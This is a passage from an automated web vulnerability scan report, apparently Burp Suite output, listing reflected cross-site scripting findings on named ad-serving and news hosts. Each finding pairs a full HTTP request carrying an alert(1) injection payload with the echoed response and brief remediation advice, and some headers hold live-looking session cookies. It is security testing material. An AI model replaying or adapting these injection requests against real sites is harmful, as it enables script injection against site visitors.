The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e664a"-alert(1)-"1983e917118 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bse664a"-alert(1)-"1983e917118?cn=rsb&c=28&pli=2320695&PluID=0&w=300&h=250&ord=2660552&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/g%3B240220354%3B0-0%3B0%3B60978287%3B4307-300/250%3B41589231/41607018/1%3B%3B%7Esscs%3D%3f$$ HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://www.npr.org/templates/reg/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=8E2371CCF36BB4CD1C3903BAFA7DB1B8; Path=/
Content-Type: text/javascript
Content-Length: 8043
Date: Mon, 09 May 2011 15:39:53 GMT
Connection: close


var adsafeVisParams = {
   mode : "jss",
   jsref : "http://www.npr.org/templates/reg/",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bse664a"-alert(1)-"1983e917118?cn=rsb&c=28&pli=2320695&PluID=0&w=300&h=250&ord=2660552&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/g%3B240220354%3B0-0%3B0%3B60978287%3B4307-300/250%3B41589231/41607018/1%3B%3B%7Esscs
...[SNIP]...

2.83. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs [c parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs

Issue detail

The value of the c request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 81450"-alert(1)-"a8455fefa1a was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs?cn=rsb&c=2881450"-alert(1)-"a8455fefa1a&pli=2320695&PluID=0&w=300&h=250&ord=2660552&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/g%3B240220354%3B0-0%3B0%3B60978287%3B4307-300/250%3B41589231/41607018/1%3B%3B%7Esscs%3D%3f$$ HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://www.npr.org/templates/reg/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=CEF8081690D6E9E07703051E14EAEF7F; Path=/
Content-Type: text/javascript
Content-Length: 8043
Date: Mon, 09 May 2011 15:39:52 GMT
Connection: close


var adsafeVisParams = {
   mode : "jss",
   jsref : "http://www.npr.org/templates/reg/",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs?cn=rsb&c=2881450"-alert(1)-"a8455fefa1a&pli=2320695&PluID=0&w=300&h=250&ord=2660552&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/g%3B240220354%3B0-0%3B0%3B60978287%3B4307-300/250%3B41589231/41607018/1%3B%3B%7Esscs%3D%3f$$",
   
...[SNIP]...

2.84. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs [cn parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs

Issue detail

The value of the cn request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 957da"-alert(1)-"78ec1831ab6 was submitted in the cn parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs?cn=rsb957da"-alert(1)-"78ec1831ab6&c=28&pli=2320695&PluID=0&w=300&h=250&ord=2660552&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/g%3B240220354%3B0-0%3B0%3B60978287%3B4307-300/250%3B41589231/41607018/1%3B%3B%7Esscs%3D%3f$$ HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://www.npr.org/templates/reg/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=F1F0E0C0EAEF9DD5E89E5026D7B2B06C; Path=/
Content-Type: text/javascript
Content-Length: 8043
Date: Mon, 09 May 2011 15:39:51 GMT
Connection: close


var adsafeVisParams = {
   mode : "jss",
   jsref : "http://www.npr.org/templates/reg/",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs?cn=rsb957da"-alert(1)-"78ec1831ab6&c=28&pli=2320695&PluID=0&w=300&h=250&ord=2660552&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/g%3B240220354%3B0-0%3B0%3B60978287%3B4307-300/250%3B41589231/41607018/1%3B%3B%7Esscs%3D%3f$
...[SNIP]...

2.85. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs [h parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs

Issue detail

The value of the h request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dbdb4"-alert(1)-"d71fc6467dd was submitted in the h parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2320695&PluID=0&w=300&h=250dbdb4"-alert(1)-"d71fc6467dd&ord=2660552&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/g%3B240220354%3B0-0%3B0%3B60978287%3B4307-300/250%3B41589231/41607018/1%3B%3B%7Esscs%3D%3f$$ HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://www.npr.org/templates/reg/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=6C95250B28D8036DD98940A9996ED89B; Path=/
Content-Type: text/javascript
Content-Length: 8043
Date: Mon, 09 May 2011 15:39:52 GMT
Connection: close


var adsafeVisParams = {
   mode : "jss",
   jsref : "http://www.npr.org/templates/reg/",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2320695&PluID=0&w=300&h=250dbdb4"-alert(1)-"d71fc6467dd&ord=2660552&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/g%3B240220354%3B0-0%3B0%3B60978287%3B4307-300/250%3B41589231/41607018/1%3B%3B%7Esscs%3D%3f$$",
   adsafeSep : "&",
   requrl : "",
   
...[SNIP]...

2.86. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d076c"-alert(1)-"1445d99a69b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2320695&PluID=0&w=300&h=250&ord=2660552&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/g%3B240220354%3B0-0%3B0%3B60978287%3B4307-300/250%3B41589231/41607018/1%3B%3B%7Esscs%3D%3f$$&d076c"-alert(1)-"1445d99a69b=1 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://www.npr.org/templates/reg/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=44720CDF40B1E1003F60667678267C13; Path=/
Content-Type: text/javascript
Content-Length: 8046
Date: Mon, 09 May 2011 15:39:52 GMT
Connection: close


var adsafeVisParams = {
   mode : "jss",
   jsref : "http://www.npr.org/templates/reg/",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2320695&PluID=0&w=300&h=250&ord=2660552&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/g%3B240220354%3B0-0%3B0%3B60978287%3B4307-300/250%3B41589231/41607018/1%3B%3B%7Esscs%3D%3f$$&d076c"-alert(1)-"1445d99a69b=1",
   adsafeSep : "&",
   requrl : "",
   reqquery : "",
   debug : "false"
};


(function(){var f="3.6";var o=(adsafeVisParams.debug==="true");var y=2000;var z={INFO:"info",LOG:"log",DIR:"dir"};var k=functi
...[SNIP]...

2.87. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs [ncu parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs

Issue detail

The value of the ncu request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e7d6c"-alert(1)-"80b9417c1c7 was submitted in the ncu parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2320695&PluID=0&w=300&h=250&ord=2660552&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/g%3B240220354%3B0-0%3B0%3B60978287%3B4307-300/250%3B41589231/41607018/1%3B%3B%7Esscs%3D%3f$$e7d6c"-alert(1)-"80b9417c1c7 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://www.npr.org/templates/reg/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=CD7729D9C7FC8F4643AA4077B8F2FE0A; Path=/
Content-Type: text/javascript
Content-Length: 8043
Date: Mon, 09 May 2011 15:39:52 GMT
Connection: close


var adsafeVisParams = {
   mode : "jss",
   jsref : "http://www.npr.org/templates/reg/",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2320695&PluID=0&w=300&h=250&ord=2660552&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/g%3B240220354%3B0-0%3B0%3B60978287%3B4307-300/250%3B41589231/41607018/1%3B%3B%7Esscs%3D%3f$$e7d6c"-alert(1)-"80b9417c1c7",
   adsafeSep : "&",
   requrl : "",
   reqquery : "",
   debug : "false"
};


(function(){var f="3.6";var o=(adsafeVisParams.debug==="true");var y=2000;var z={INFO:"info",LOG:"log",DIR:"dir"};var k=function
...[SNIP]...

2.88. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs [ord parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs

Issue detail

The value of the ord request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4390c"-alert(1)-"b19235bef5c was submitted in the ord parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2320695&PluID=0&w=300&h=250&ord=26605524390c"-alert(1)-"b19235bef5c&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/g%3B240220354%3B0-0%3B0%3B60978287%3B4307-300/250%3B41589231/41607018/1%3B%3B%7Esscs%3D%3f$$ HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://www.npr.org/templates/reg/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=091B0556134C33307EDDBD3CA4F49AA5; Path=/
Content-Type: text/javascript
Content-Length: 8043
Date: Mon, 09 May 2011 15:39:52 GMT
Connection: close


var adsafeVisParams = {
   mode : "jss",
   jsref : "http://www.npr.org/templates/reg/",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2320695&PluID=0&w=300&h=250&ord=26605524390c"-alert(1)-"b19235bef5c&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/g%3B240220354%3B0-0%3B0%3B60978287%3B4307-300/250%3B41589231/41607018/1%3B%3B%7Esscs%3D%3f$$",
   adsafeSep : "&",
   requrl : "",
   reqquery : "
...[SNIP]...

2.89. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs [pli parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs

Issue detail

The value of the pli request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8f5b8"-alert(1)-"63705da3f9a was submitted in the pli parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=23206958f5b8"-alert(1)-"63705da3f9a&PluID=0&w=300&h=250&ord=2660552&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/g%3B240220354%3B0-0%3B0%3B60978287%3B4307-300/250%3B41589231/41607018/1%3B%3B%7Esscs%3D%3f$$ HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://www.npr.org/templates/reg/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=EE59EBF0BC8D542B7477BE784AA60A6E; Path=/
Content-Type: text/javascript
Content-Length: 8043
Date: Mon, 09 May 2011 15:39:51 GMT
Connection: close


var adsafeVisParams = {
   mode : "jss",
   jsref : "http://www.npr.org/templates/reg/",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=23206958f5b8"-alert(1)-"63705da3f9a&PluID=0&w=300&h=250&ord=2660552&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/g%3B240220354%3B0-0%3B0%3B60978287%3B4307-300/250%3B41589231/41607018/1%3B%3B%7Esscs%3D%3f$$",
   adsafeSep :
...[SNIP]...

2.90. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs [w parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs

Issue detail

The value of the w request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 44ad2"-alert(1)-"8cca0a3c179 was submitted in the w parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2320695&PluID=0&w=30044ad2"-alert(1)-"8cca0a3c179&h=250&ord=2660552&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/g%3B240220354%3B0-0%3B0%3B60978287%3B4307-300/250%3B41589231/41607018/1%3B%3B%7Esscs%3D%3f$$ HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://www.npr.org/templates/reg/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=4ED83BE5AD07FABADC71565EC8709ACE; Path=/
Content-Type: text/javascript
Content-Length: 8043
Date: Mon, 09 May 2011 15:39:51 GMT
Connection: close


var adsafeVisParams = {
   mode : "jss",
   jsref : "http://www.npr.org/templates/reg/",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2320695&PluID=0&w=30044ad2"-alert(1)-"8cca0a3c179&h=250&ord=2660552&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/g%3B240220354%3B0-0%3B0%3B60978287%3B4307-300/250%3B41589231/41607018/1%3B%3B%7Esscs%3D%3f$$",
   adsafeSep : "&",
   requrl :
...[SNIP]...

2.91. http://i.usatoday.net/asp/usatly/handler.ashx [longUrl parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://i.usatoday.net
Path:   /asp/usatly/handler.ashx

Issue detail

The value of the longUrl request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e7f74'%3balert(1)//9b90896c602 was submitted in the longUrl parameter. This input was echoed as e7f74';alert(1)//9b90896c602 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /asp/usatly/handler.ashx?longUrl=e7f74'%3balert(1)//9b90896c602 HTTP/1.1
Host: i.usatoday.net
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Vary: Accept-Encoding
Cache-Control: private, max-age=86400
Date: Mon, 09 May 2011 15:38:05 GMT
Connection: close
Content-Length: 140

var usatlyshorturl = 'e7f74';alert(1)//9b90896c602'; // Currently only the following domains are supported: usatoday.com,usatodayeducate.com

2.92. http://ib.adnxs.com/ab [cnd parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ab

Issue detail

The value of the cnd request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8dd65'-alert(1)-'9350f9133f9 was submitted in the cnd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ab?enc=AQAAAAAADEAAAAAAAAAMQAAAAAAAAAxAAAAAAAAADEAAAAAAAAAMQODGbwg69CFkSsYda6b2ziWrCchNAAAAAC4hAAC1AAAAlgIAAAIAAADHpAIA0WMAAAEAAABVU0QAVVNEACwB-gB3C04AEA8BAgUCAAQAAAAAehMn5gAAAAA.&tt_code=vert-107&udj=uf%28%27a%27%2C+9797%2C+1304955326%29%3Buf%28%27c%27%2C+45814%2C+1304955326%29%3Buf%28%27r%27%2C+173255%2C+1304955326%29%3Bppv%288991%2C+%277215316608111068896%27%2C+1304955326%2C+1304998526%2C+45814%2C+25553%29%3B&cnd=!eRMkCwj25QIQx8kKGAAg0ccBKE4xAAAAAAAADEBCEwgAEAAYACABKP7__________wFIAFAAWPcWYABolgU.8dd65'-alert(1)-'9350f9133f9&referrer=http://www.csmonitor.com/Business&pp=TcgJqwAJrDQK5ToFmVxG_jr_KjIn-i4M6rRykw&pubclick=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBAFOqqwnITbTYJoX0lAf-jfHKCdfq-NMBl6GU7BjZ59HSHwAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi02NzQzNjIyNTI1MjAyNTcyoAHD8v3sA7IBEXd3dy5jc21vbml0b3IuY29tugEKMzAweDI1MF9hc8gBCdoBIWh0dHA6Ly93d3cuY3Ntb25pdG9yLmNvbS9CdXNpbmVzc5gCwAzAAgTIAoXSzwrgAgDqAhAzMDB4MjUwQ19HZW5lcmFsqAMB6ANr6AOTBegDmAPoA4sJ6AOMCfUDAgQARPUDIAAAAOAEAYAG6cSF9MWQ1oky%26num%3D1%26sig%3DAGiWqtygYYY1WjNaewxmNUetXvrYk6kjZg%26client%3Dca-pub-6743622525202572%26adurl%3D HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChII-YMBEAoYASABKAEwy-af7gQKEgjxlQEQChgCIAIoAjC055_uBBC055_uBBgC; sess=1; uuid2=2724386019227846218; anj=Kfw)(CZ#0c)_Vsd7xrIB//C+rXs=j-NmSHESbuj(Xfy%gQ8(_!$Qn`j>l!w]Qc4sqiteE')fkA#BuR9S#?g?x96rwk*ZwCg%AAgCaQC9oD/Z'3KOz[NgtOXq7:8zNI%RI]VLxSk0/<ReOqu`kW+mpt*RcdU`309#Npmqz:f120r*CIweF>wD.dc[jewf7Jg1C%'=:^a?O!THxg^g6]dlW4kBRMj<u?URG7od_TaFgZ6+E*Ien0D+8EWfv:I`ua'+iw%6g8[*WG-xb.gqGglNq=ppU9pMi>NhIWtG!c<-Hz]x$Nj*ieT0/DS+p9-9itwW.^@-FVBcEA%SQ3D#EVY@pHSJKc1qYrpTfZ+^5CoqqS0JzwnQMX0h^)-5M6iw68MyaTc`NLmrB$Up8jXday>aPC4HGACKGA<XW6tO(HpUYp@EZKc@qTY<b(XFqNJ5Lo(Q%@XrX2UOpjstXFBy^^OTow.15i]1m'KEuj>:`7Jfb$qToO]KZDC!p(2=spx-Wkmic-P-=$d<X]p6j]/LnTgv#/BjiE%RGEQhY)+`5Iw`Y.[O0:ufI'/oAjfj5OJE@2X-prW^X0@]6u9gl4:1lI9Pi)1j^Mc@XYz4^70y1M0s_2Y`wz]XIhEQ_(

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 10-May-2011 15:35:46 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 15:35:46 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 15:35:46 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)(CZ#0c)_Vsd7xrIB//C+rXs=j-NmSHESbuj(Xfy%gQ8(_!$Qn`j>l!w]Qc4sqiteE')fkA#BuR9S#?g?x96rwk*ZwCg%AAgCaQC9oD/Z'3KOz[NgtOXq7:8zNI%RI]VLxSk0/<ReOqu`kW+mpt*RcdU`309#Npmqz:f120r*CIweF>wD.dc[jewf7Jg1C%'=:^a?O!THxg^g6]dlW4kBRMj<u?URG7od_TaFgZ6+E*Ien0D+8EWfv:I`ua'+iw%6g8[*WG-xb.gqGglNq=ppU9pMi>NhIWtG!c<-Hz]x$Nj*ieT0/DS+p9-9itwW.^@-FVBcEA%SQ3D#EVY@pHSJKc1qYrpTfZ+^5CoqqS0JzwnQMX0h^)-5M6iw68MyaTc`NLmrB$Up8jXday>aPC4HGACKGA<XW6tO(HpUYp@EZKc@qTY<b(XFqNJ5Lo(Q%@XrX2UOpjstXFBy^^OTow.15i]1m'KEuj>:`7Jfb$qToO]KZDC!p(2=spx-Wkmic-P-=$d<X]p6j]/LnTgv#/BjiE%RGEQhY)+`5Iw`Y.[O0:ufI'/oAjfj5OJE@2X-prW^X0@]6u9gl4:1lI9Pi)1j^Mc@XYz4^70y1M0s_2Y`wz]XIhEQ_(; path=/; expires=Sun, 07-Aug-2011 15:35:46 GMT; domain=.adnxs.com; HttpOnly
Date: Mon, 09 May 2011 15:35:46 GMT
Content-Length: 1385

